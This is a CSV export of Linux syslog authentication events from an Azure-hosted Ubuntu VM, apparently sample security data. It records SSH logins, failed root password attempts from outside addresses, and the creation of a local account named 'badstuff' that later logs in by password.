+19425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:20:05,UbuntuDevEnv,2019-06-07 21:20:04,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 167.220.2.54 port 44032 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,167.220.2.5,44032,,
+19426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:20:05,UbuntuDevEnv,2019-06-07 21:20:04,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:20:05,UbuntuDevEnv,2019-06-07 21:20:04,auth,UbuntuDevEnv,info,New session 7 of user peteb.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:22:12,UbuntuDevEnv,2019-06-07 21:22:12,auth,UbuntuDevEnv,info,Did not receive identification string from 134.209.40.67 port 53501,4636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.40.6,53501,,
+19429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:30:02,UbuntuDevEnv,2019-06-07 21:30:02,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 218.92.0.172 port 47114 [preauth],5342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,218.92.0.1,47114,,
+19430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:30:02,UbuntuDevEnv,2019-06-07 21:30:02,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.172 port 47114:11:  [preauth],5342,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,47114,,
+19431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:38:06,UbuntuDevEnv,2019-06-07 21:38:05,auth,UbuntuDevEnv,info,Connection reset by 209.17.96.58 port 44895 [preauth],6224,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,209.17.96.5,44895,,
+19432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:08:07,UbuntuDevEnv,2019-06-07 22:08:06,authpriv,UbuntuDevEnv,info,"group added to /etc/group: name=badstuff, GID=1003",9355,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:08:07,UbuntuDevEnv,2019-06-07 22:08:06,authpriv,UbuntuDevEnv,info,"new group: name=badstuff, GID=1003",9355,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:08:07,UbuntuDevEnv,2019-06-07 22:08:06,authpriv,UbuntuDevEnv,info,group added to /etc/gshadow: name=badstuff,9355,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:08:07,UbuntuDevEnv,2019-06-07 22:08:06,authpriv,UbuntuDevEnv,info,"new user: name=badstuff, UID=1003, GID=1003, home=/home/badstuff, shell=/bin/bash",9360,10.0.1.4,useradd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:08:31,UbuntuDevEnv,2019-06-07 22:08:31,authpriv,UbuntuDevEnv,notice,pam_unix(passwd:chauthtok): password changed for badstuff,9387,10.0.1.4,passwd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:08:35,UbuntuDevEnv,2019-06-07 22:08:35,authpriv,UbuntuDevEnv,info,changed user 'badstuff' information,9412,10.0.1.4,chfn,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:09:17,UbuntuDevEnv,2019-06-07 22:09:17,auth,UbuntuDevEnv,info,Received signal 15  terminating.,1488,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:09:17,UbuntuDevEnv,2019-06-07 22:09:17,auth,UbuntuDevEnv,info,Server listening on :: port 22.,9557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,22,,
+19440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:09:17,UbuntuDevEnv,2019-06-07 22:09:17,auth,UbuntuDevEnv,info,Server listening on 0.0.0.0 port 22.,9557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,0.0.0.0,22,,
+19441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:02,UbuntuDevEnv,2019-06-07 23:28:02,auth,UbuntuDevEnv,info,Accepted password for badstuff from 104.210.58.65 port 49088 ssh2,18336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,104.210.58.6,49088,,
+19442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:02,UbuntuDevEnv,2019-06-07 23:28:02,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user badstuff by (uid=0),18336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+19443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:02,UbuntuDevEnv,2019-06-07 23:28:02,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user badstuff by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+19444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:02,UbuntuDevEnv,2019-06-07 23:28:02,auth,UbuntuDevEnv,info,New session 181 of user badstuff.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+19445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:07,UbuntuDevEnv,2019-06-07 23:28:07,auth,UbuntuDevEnv,info,Disconnected from user badstuff 104.210.58.65 port 49088,18465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,104.210.58.6,49088,,
+19446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:07,UbuntuDevEnv,2019-06-07 23:28:07,auth,UbuntuDevEnv,info,Received disconnect from 104.210.58.65 port 49088:11: disconnected by user,18465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.210.58.6,49088,,user
+19447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:07,UbuntuDevEnv,2019-06-07 23:28:07,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user badstuff,18336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+19448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:07,UbuntuDevEnv,2019-06-07 23:28:07,auth,UbuntuDevEnv,info,Removed session 181.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:26,UbuntuDevEnv,2019-06-07 23:28:26,auth,UbuntuDevEnv,info,Received signal 15  terminating.,9557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:26,UbuntuDevEnv,2019-06-07 23:28:26,auth,UbuntuDevEnv,info,Server listening on 0.0.0.0 port 22.,18521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,0.0.0.0,22,,
+19451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:26,UbuntuDevEnv,2019-06-07 23:28:26,auth,UbuntuDevEnv,info,Server listening on :: port 22.,18521,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,22,,
+19452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:27,UbuntuDevEnv,2019-06-07 23:28:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=116.234.164.42  user=root,18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,116.234.164.4,,0,
+19453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:29,UbuntuDevEnv,2019-06-07 23:28:28,auth,UbuntuDevEnv,info,Failed password for root from 116.234.164.42 port 46839 ssh2,18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,116.234.164.4,46839,,
+19454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:29,UbuntuDevEnv,2019-06-07 23:28:29,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,4193,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:29,UbuntuDevEnv,2019-06-07 23:28:29,auth,UbuntuDevEnv,info,Removed session 5.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:29,UbuntuDevEnv,2019-06-07 23:28:29,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:29,UbuntuDevEnv,2019-06-07 23:28:29,auth,UbuntuDevEnv,info,Removed session 7.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 23:28:31,UbuntuDevEnv,2019-06-07 23:28:30,auth,UbuntuDevEnv,info,Failed password for root from 116.234.164.42 port 46839 ssh2,18495,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,116.234.164.4,46839,,
+19459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:23:55,UbuntuDevEnv,2019-06-03 21:23:54,auth,UbuntuDevEnv,info,Protocol major versions differ for 183.129.174.251 port 25805: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.99-3.2.9 SSH Secure Shell for Windows,2071,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.129.174.2,25805,,
+19460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:04,UbuntuDevEnv,2019-06-03 21:26:04,auth,UbuntuDevEnv,info,Protocol major versions differ for 60.191.20.210 port 56358: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.99-3.2.9 SSH Secure Shell for Windows,2113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,60.191.20.2,56358,,
+19461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:46,UbuntuDevEnv,2019-06-03 21:26:45,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.174.54 port 29522 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,2116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.174.5,29522,,
+19462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:46,UbuntuDevEnv,2019-06-03 21:26:45,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),2116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:46,UbuntuDevEnv,2019-06-03 21:26:45,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:46,UbuntuDevEnv,2019-06-03 21:26:45,auth,UbuntuDevEnv,info,New session 6 of user peteb.,1200,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:47,UbuntuDevEnv,2019-06-03 21:26:47,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.174.54 port 35439 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,2129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.174.5,35439,,
+19466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:47,UbuntuDevEnv,2019-06-03 21:26:47,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),2129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:26:47,UbuntuDevEnv,2019-06-03 21:26:47,auth,UbuntuDevEnv,info,New session 8 of user peteb.,1200,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:12,UbuntuDevEnv,2019-06-03 21:28:11,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,2116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:12,UbuntuDevEnv,2019-06-03 21:28:11,auth,UbuntuDevEnv,info,Removed session 6.,1200,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:12,UbuntuDevEnv,2019-06-03 21:28:11,auth,UbuntuDevEnv,info,Removed session 8.,1200,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:12,UbuntuDevEnv,2019-06-03 21:28:11,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,2129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:45,UbuntuDevEnv,2019-06-03 21:28:45,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.174.54 port 53181 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,2456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.174.5,53181,,
+19473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:45,UbuntuDevEnv,2019-06-03 21:28:45,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),2456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:45,UbuntuDevEnv,2019-06-03 21:28:45,auth,UbuntuDevEnv,info,New session 11 of user peteb.,1200,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:45,UbuntuDevEnv,2019-06-03 21:28:45,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:47,UbuntuDevEnv,2019-06-03 21:28:46,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),2463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:47,UbuntuDevEnv,2019-06-03 21:28:46,auth,UbuntuDevEnv,info,New session 13 of user peteb.,1200,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 21:28:47,UbuntuDevEnv,2019-06-03 21:28:46,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.174.54 port 33277 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,2463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.174.5,33277,,
+19479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 22:12:03,UbuntuDevEnv,2019-06-03 22:12:03,auth,UbuntuDevEnv,info,Did not receive identification string from 45.40.166.143 port 48379,16605,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.40.166.1,48379,,
+19480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:56:32,UbuntuDevEnv,2019-06-06 17:56:32,auth,UbuntuDevEnv,info,Did not receive identification string from 128.199.149.61 port 54172,8941,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,128.199.149.6,54172,,
+19481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:59:40,UbuntuDevEnv,2019-06-06 17:59:39,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 36748:11: Normal Shutdown, Thank you for playing [preauth]",9210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,36748,,
+19482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:59:40,UbuntuDevEnv,2019-06-06 17:59:39,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 36748 [preauth],9210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,36748,,
+19483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:59:46,UbuntuDevEnv,2019-06-06 17:59:46,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 41388 [preauth],9221,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,41388,,
+19484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:59:46,UbuntuDevEnv,2019-06-06 17:59:46,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 41388:11: Normal Shutdown, Thank you for playing [preauth]",9221,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,41388,,
+19485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:59:53,UbuntuDevEnv,2019-06-06 17:59:52,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 128.199.149.61 port 46006 [preauth],9240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,128.199.149.6,46006,,
